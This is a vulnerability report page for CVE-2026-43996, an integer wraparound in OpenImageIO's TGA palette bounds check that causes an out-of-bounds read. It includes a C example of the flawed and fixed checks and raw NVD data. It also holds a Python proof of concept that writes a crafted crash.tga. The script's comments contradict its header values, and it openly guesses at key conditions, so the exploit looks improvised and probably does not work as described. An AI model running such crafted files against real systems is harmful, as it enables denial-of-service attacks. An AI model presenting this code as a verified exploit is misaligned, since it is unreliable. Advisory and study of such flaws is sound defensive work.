Security Vulnerability Report
CVE-2026-43996 CVSS 5.5 MEDIUM

CVE-2026-43996

Published: 2026-05-14 20:17:07
Last Modified: 2026-05-14 21:21:11

Description

OpenImageIO is a toolset for reading, writing, and manipulating image files of any image file format relevant to VFX / animation. Prior to 3.0.18.0 and 3.1.13.0, the bounds check in TGAInput::decode_pixel computes k + palbytespp as unsigned 32-bit arithmetic. When k = 0xFFFFFFFC and palbytespp = 4, the addition wraps to 0, which compares less than palette_alloc_size and passes the check. The subsequent palette access uses the unwrapped k (0xFFFFFFFC) as the index, reading ~4 GB past the start of the palette buffer, causing a SEGV. This vulnerability is fixed in 3.0.18.0 and 3.1.13.0.
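The wrapping check described above, next to an overflow-safe form, as an added example that is not OpenImageIO's code or its actual patch. The function names, the `alloc_size` parameter (standing in for palette_alloc_size) and the sample palette and offsets are assumptions constructed for illustration.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed shape of the pre-fix check: the sum is computed in 32 bits and
 * can wrap to a small value before it is compared. */
bool in_bounds_wrapping(uint32_t k, uint32_t palbytespp, uint32_t alloc_size)
{
    return (uint32_t)(k + palbytespp) <= alloc_size;
}

/* Overflow-safe form: subtract from the known-good size instead of adding
 * to the untrusted offset, so nothing can wrap. */
bool in_bounds_safe(uint32_t k, uint32_t palbytespp, uint32_t alloc_size)
{
    return palbytespp <= alloc_size && k <= alloc_size - palbytespp;
}

/* Copy one palette entry only when the safe check accepts the offset. */
bool read_palette_entry(const uint8_t *palette, uint32_t alloc_size,
                        uint32_t k, uint32_t palbytespp, uint8_t *out)
{
    if (!in_bounds_safe(k, palbytespp, alloc_size))
        return false; /* reject the pixel; never index with k */
    memcpy(out, palette + k, palbytespp);
    return true;
}

int main(void)
{
    uint8_t palette[256 * 4] = {0}; /* constructed 256-entry, 4-byte palette */
    uint8_t px[4];
    uint32_t size = sizeof palette;
    uint32_t offsets[] = {0, 1020, 1021, 0xFFFFFFFCu}; /* constructed */

    for (size_t i = 0; i < sizeof offsets / sizeof offsets[0]; i++) {
        uint32_t k = offsets[i];
        printf("k=0x%08X wrapping=%d safe=%d read=%d\n", (unsigned)k,
               in_bounds_wrapping(k, 4, size), in_bounds_safe(k, 4, size),
               read_palette_entry(palette, size, k, 4, px));
    }
    return 0;
}
```

Widening the sum to 64 bits before comparing is an equivalent fix; the subtraction form shown here avoids relying on a wider type being available.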

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

OpenImageIO < 3.0.18.0
OpenImageIO < 3.1.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import struct

# Create a malicious TGA file to trigger the overflow
# TGA Header: ID length(1), Color map type(1), Image type(1)
# Color map spec(5), Image spec(10)
# We need specific conditions to hit k=0xFFFFFFFC and palbytespp=4
# This is a simplified PoC structure demonstrating the concept.

def generate_malicious_tga(filename):
    with open(filename, 'wb') as f:
        # TGA Header (Simplified)
        # Image type 1 (Uncompressed, Color-mapped)
        header = b'\x00\x01\x01'
        # Color map spec: first entry index (2 bytes), length (2 bytes), entry size (1 byte)
        # Setting entry size to 4 bytes (palbytespp = 4)
        colormap_spec = struct.pack('<HHB', 0, 256, 8)  # 8 bits per entry? No, usually 24/32. Let's assume 32bit map.
        # To trigger k=0xFFFFFFFC, the image data needs to contain this index.
        # Image spec: x(2), y(2), width(2), height(2), pixel depth(1), descriptor(1)
        width = 1
        height = 1
        image_spec = struct.pack('<HHHHBB', 0, 0, width, height, 8, 0)
        f.write(header + colormap_spec + image_spec)
        # Write Color Map Data (dummy)
        f.write(b'\x00' * 256 * 4)
        # Write Image Data (Pixel Index)
        # Writing 0xFFFFFFFC as the index to trigger the bug in decode_pixel
        # Note: Dependent on how OpenImageIO reads the byte stream for indices.
        # If it reads a byte, max is 0xFF. If it reads a short/long, 0xFFFFFFFC is possible.
        # Assuming the context allows for this index value.
        f.write(struct.pack('<I', 0xFFFFFFFC))

if __name__ == "__main__":
    generate_malicious_tga('crash.tga')
    print('Malicious TGA file generated: crash.tga')
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43996", "sourceIdentifier": "[email protected]", "published": "2026-05-14T20:17:07.300", "lastModified": "2026-05-14T21:21:10.620", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenImageIO is a toolset for reading, writing, and manipulating image files of any image file format relevant to VFX / animation. Prior to 3.0.18.0 and 3.1.13.0, the bounds check in TGAInput::decode_pixel computes k + palbytespp as unsigned 32-bit arithmetic. When k = 0xFFFFFFFC and palbytespp = 4, the addition wraps to 0, which compares less than palette_alloc_size and passes the check. The subsequent palette access uses the unwrapped k (0xFFFFFFFC) as the index, reading ~4 GB past the start of the palette buffer \u2014 SEGV. This vulnerability is fixed in 3.0.18.0 and 3.1.13.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "references": [{"url": "https://github.com/AcademySoftwareFoundation/OpenImageIO/security/advisories/GHSA-mq8j-73c4-cr55", "source": "[email protected]"}]}}